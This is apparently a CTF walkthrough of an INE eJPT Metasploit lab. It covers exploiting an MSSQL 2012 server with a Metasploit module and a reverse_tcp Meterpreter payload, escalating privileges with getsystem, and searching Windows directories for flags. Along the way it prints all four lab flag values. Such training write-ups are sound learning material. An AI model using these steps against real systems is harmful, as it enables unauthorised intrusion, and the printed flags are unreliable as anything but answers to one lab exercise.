Host & Network Penetration Testing: The Metasploit Framework CTF 1 (EJPT INE)
Hello everyone,
A little late for this walkthrough due to some work! Let’s dive into the first CTF of the Metasploit Framework.
Let’s get started!
Q.1 Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.
As always, we start with an Nmap scan. Here’s the command: nmap -sC -sV target.ine.local — min-rate 1000
This command performs a service and version scan (-sC -sV) while setting a minimum packet rate of 1000 (--min-rate 1000) to speed up the scan.
Now that we know MSSQL Server is running on port 1433, and the version is SQL Server 2012 (11.00.6020.00; SP3), we can search for an exploit based on this version.
To do this, we can use Metasploit. Start Metasploit by typing: msfconsole use metasploit. Once inside Metasploit, search for available exploits related to MSSQL 2012 using search MSSQL 2012.
At the top, we can see the relevant exploit. To select it, use the following command: use 0
We can also get detailed information about this module by using the info command. The description confirms that this exploit has been tested on SQL Server 2012, so it is suitable for our target. Now, we can proceed with configuring the required options before executing the exploit.
Set RHOSTS to target.ine.local. Then, run the exploit by typing: run
Since the exploit supports x86 architecture, but we are targeting a 64-bit system, we need to set a compatible payload. To change the payload to x64 architecture, use the following command: set PAYLOAD windows/x64/meterpreter/reverse_tcp. After setting the correct payload, we can proceed to run the exploit again.
Now that we have a successful Meterpreter session, we can interact with the target system. To make the session more interactive, type the following command:shell
This will drop us into a regular command shell on the target machine.
To find the first flag, navigate to the C drive by typing: cd C:\ . After that, list the contents of the directory to find the file that contains the flag: dir
Now that we’ve located the flag, we can use the type command to read its content.
FLAG 1: edb42cc5b37e4a1cac0cf88022f3c70dQ.2 Locate the second flag within the Windows configuration folder.
For the second flag, we want to check the Windows configuration folder, which is usually found in the System32 directory. To navigate to it, type the following command: cd Windows\System32
To list only the directories in the System32 folder, use the following command: dir /a:d . This will filter the results and show only the directories.
Now that we can see the config folder, navigate into it using the cd command.
We don’t have access to view the contents. To check this, we need to first review our privileges. Let’s get back to our Meterpreter session by using Ctrl + C. Then, type getprivs to view the privileges that the current user has.
These privs are for the user. We can use getsystem to elevate the privileges because if SeImpersonatePrivilege is present, getsystem is likely to succeed using Named Pipe Impersonation.
We have elevated our privileges. Now, we can use the shell command again to get the shell and continue searching for the second flag.
We have successfully entered the config directory. Type dir to list the contents.
We have found the second flag. To read its contents, use the command type flag2.txt.
FLAG 2: 95c12d0654eb4eac91db88262d644ac1Q.3 The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.
The question states that the third flag is also hidden within the system directory, but we don’t know its exact location. However, we know that the flag files end with .txt. To search for those files, use the following command: dir C:\Windows\System32\*.txt /s /b.
This command will search for all .txt files within the System32 directory and its subdirectories.
We see a file named EscalatePrivilageToGetThisFlag.txt. To read its contents, type the following command: type C:\Windows\System32\drivers\etc\EscaltePrivilageToGetThisFlag.txt.
FLAG 3: 9a1dad2c57f441ac83d6755856f364c6Q.4 Investigate the Administrator directory to find the fourth flag.
Since we have already elevated our privileges, let’s navigate to the Administrator directory to find the fourth flag.
To list the contents, type dir. Let's navigate to the Desktop directory.
And here we have found our last flag, which is:
FLAG 4: f7337e642619460c8b1fee34114e578aThank you, everyone, for reading!
Happy Hacking!
